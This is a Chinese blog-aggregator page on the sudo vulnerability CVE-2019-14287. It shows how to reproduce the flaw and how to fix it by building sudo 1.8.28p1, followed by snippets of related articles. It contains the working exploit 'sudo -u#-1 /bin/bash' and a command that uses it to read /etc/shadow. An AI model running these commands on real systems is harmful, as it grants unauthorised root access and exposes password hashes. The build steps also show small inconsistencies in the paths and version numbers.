cve-2019-14287漏洞与修复过程(代码片段)

慕書 慕書     2022-12-06     538

关键词:

CVE-2019-14287漏洞与修复过程

CVE-2019-14287漏洞

CVE-2019-14287本地提权漏洞,漏洞因为是Sudo<1.8.28,只需要升级sudo>1.8.28的就可以修复完成

展示

  1. 使用root用户修改权限文件:vim /etc/sudoers ,添加如下:
chen ALL=(ALL,!root) ALL


2. 添加用户:chen, chen

Useradd chen
Passwd chen
  1. 使用chen用户查看文件是没有权限的: cat /etc/shadow
  2. 使用命令, sudo -u#-1 cat /etc/shadow
    可以看到,chen用户被提权看到这个文件的内容
  3. 查看当前登录的用户:whoami
    是为:chen
    6.,chen用户使用命令: ** sudo -u#-1 /bin/bash**;
    再次输入whoami,直接是root用户
    7.再使用命令: su root
    直接不需要密码,直接提权了,变成了root用户

修复漏洞

1.下载修复的包:wget http://www.sudo.ws/dist/sudo-1.8.28p1.tar.gz


2.解压:tar -zxvf sudo-1.8.28p1.tar.gz
3.进入目录:cd sudo-1.8.28p1 ; 然后安装

/configure --prefix=/usr              \\
            --libexecdir=/usr/lib      \\
            --with-secure-path         \\
            --with-all-insults         \\
            --with-env-editor          \\
            --docdir=/usr/share/doc/sudo-1.9.2 \\
            --with-passprompt="[sudo] password for %p: " &&
make

4.再执行:make install && ln -sfv libsudo_util.so.0.0.0 /usr/lib/sudo/libsudo_util.so.0
5.修复成功

(cve-2019-14287)sudo提权漏洞

(CVE-2019-14287)sudo提权漏洞一、漏洞简介sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,漏洞主要原因因为将用户ID转换为用户名的函数,会将-1(或无效等效的4294967295)误认为0... 查看详情

漏洞测试sudo:cve-2019-14287

漏洞详情  sudo错误的处理了某些用户id.攻击者可以以根用户身份执行任意命令。系统平台  kali-Linux软件版本  1.8.27  sudo作用  非root用户不需要知道root密码,就可以执行root才能执行的命令。 首先新建test用... 查看详情

2019-10-16,sudo提权漏洞(cve-2019-14287)实现

...配置文件,/etc/sudoers,将sudo使用权限赋予该用户sudo提权漏洞,是一个安全策略绕过问题,去执行某些敏感的命令,cve编号是CVE-2019-14287,影响版本是sudo版本<1.8.28漏洞复现1,查看sudo版本,命令sudo-V2,修改配置文件,vim/etc/sudoer... 查看详情

sudo提权漏洞(cve-2019-14287)复现(10.16第二十二天)

...修改配置文件/etc/sudoers,将sudo使用权赋予该账号sudo提权漏洞是一个安全策略绕过问题,去执行某些敏感的命令,CVE编号是CVE-2019-14287,影响的版本是:<1.8.28 漏洞复现过程1、查看版本:sudo-V 2、修改配置文件:vim/etc/sud... 查看详情

pjzhang:cve-2019-14287sudo权限绕过漏洞复现

...! 参考链接:Ms08067实验室公众号sudo1.8.28版本之前有漏洞,很鸡肋的。更新完kalilinux,deepin截图工具失效,只能用自带的,不能划重点。看一下sudo版本,1.8.23,centos7上操作。  设置密码1234qwer cat/etc/passwdvim/etc/sudoe... 查看详情

漏洞防御与修复工作(代码片段)

漏洞管理工作是企业安全建设必不可少的一环,在风险管理工作中,漏洞管理能够防患于未然,企业对漏洞管理有着广泛的基础建设和实践经验。但随着攻防技术的发展,传统漏洞管理的安全技术和管理过程,开始面对越来越多... 查看详情

网站程序代码存在漏洞如何挖掘和修复

网站程序代码存在漏洞如何挖掘和修复分类专栏:***测试公司网站安全漏洞检测网站漏洞修复文章标签:漏洞修复网站代码审计网站安全测试版权国内学习漏洞挖掘的习惯所谓奠定基础,学习各种编程书籍,然后学习漏洞挖掘,... 查看详情

上传文件的漏洞复现与修复(代码片段)

本文只说一些我遇到过的上传文件的漏洞。毕竟漏洞太多,我又不可能全部发现。(安全方面的小菜鸟)可能你们的系统比较完善,针对这些漏洞,已有相应的防御手段。我们针对的是那种比较简单的系统ÿ... 查看详情

web中间件漏洞复现合集---iis篇(代码片段)

目录前言一、Win2003_IIS6.0环境搭建二、PUT漏洞1.漏洞介绍2.漏洞复现3.报错问题解决4.漏洞修复方案三、短文件名猜解1.漏洞介绍2.复现过程3.漏洞修复三、Win2008R2_IIS环境搭建四、远程代码执行(一)Cve-2017-7269(0day漏洞&#... 查看详情

定心丸!zipperdown漏洞分析与修复建议

...云 发布。 近日,盘古实验室对外披露了ZipperDown漏洞,该漏洞是盘古团队针对不同客户的iOS应用安全审计的过程中发现的,大约有10%的iOS应用会受到此漏洞的影响。 利用此漏洞可以做很多事情,例如实现目录遍历攻... 查看详情

定心丸!zipperdown漏洞分析与修复建议

近日,盘古实验室对外披露了ZipperDown漏洞,该漏洞是盘古团队针对不同客户的iOS应用安全审计的过程中发现的,大约有10%的iOS应用会受到此漏洞的影响。利用此漏洞可以做很多事情,例如实现目录遍历攻击和AppContainer目录中任... 查看详情

分享网站漏洞检测与如何修复网站逻辑漏洞

分享网站漏洞检测与如何修复网站逻辑漏洞分类专栏:网站安全网站被篡改网站被黑如何防止网站被黑如何防止网站被侵入如何防止网站被挂马网站安全服务网站安全防护服务网站安全维护网站安全问题ecshop漏洞修复MetInfo漏洞... 查看详情

dedecms漏洞修复大全含任意文件上传漏洞与注入漏洞

  很多人说织梦dedecms不好,因为用的人多了,找漏洞的人也多了,那么如果我们能修复的话,这些都不是问题,今天我就为大家讲解一下如何修复任意文件上传漏洞与注入漏洞。任意文件上传漏洞修复包含一个文件/include/dialo... 查看详情

tomcat中ssiprintenv.java漏洞修复

...Tomcat的源码。但正如著名诗人李白所说的:世界上本没有漏洞,使用的人多了,也就发现了漏洞。比如今年的2月份就爆出了存在文件包含漏洞。今天我们选择两个比较直观的Tomcat漏洞去模拟整个漏洞被攻击的过程,以及漏洞为... 查看详情

dedecms漏洞修复大全含任意文件上传漏洞与注入漏洞

  很多人说织梦dedecms不好,因为用的人多了,找漏洞的人也多了,那么如果我们能修复的话,这些都不是问题,今天我就为大家讲解一下如何修复任意文件上传漏洞与注入漏洞。任意文件上传漏洞修复包含一个文件/include/dialo... 查看详情

网站漏洞检测修复短息轰炸漏洞检测与修补方案

网站漏洞检测修复短息轰炸漏洞检测与修补方案分类专栏:网站安全网站被篡改网站被黑如何防止网站被黑如何防止网站被侵入如何防止网站被挂马网站安全服务web网站安全服务怎么查找网站漏洞网站***检测网站被黑怎么修复wor... 查看详情

nginx使用“逻辑与”配置origin限制,修复cors跨域漏洞(代码片段)

目录1.漏洞报告2.漏洞复现3.Nginx修复3.1添加请求头3.2配置origin限制2.3调整origin限制1.漏洞报告漏洞名称:CORS跨域漏洞等级:中危漏洞证明:Origin从任何域名都可成功访问,未做任何限制。漏洞危害:因为同源策... 查看详情

struts2架构网站漏洞修复详情与利用漏洞修复方案

...系统,这几年来因为使用较多,被***者挖掘出来的struts2漏洞也越来越,从最一开始S2-001到现在的最新的s2-057漏洞,本文着重的给大家介绍一下struts2漏洞的利用详情以及漏洞修复办法。先从1开始吧,S2-001影响的版本是Struts2.0.0-Str... 查看详情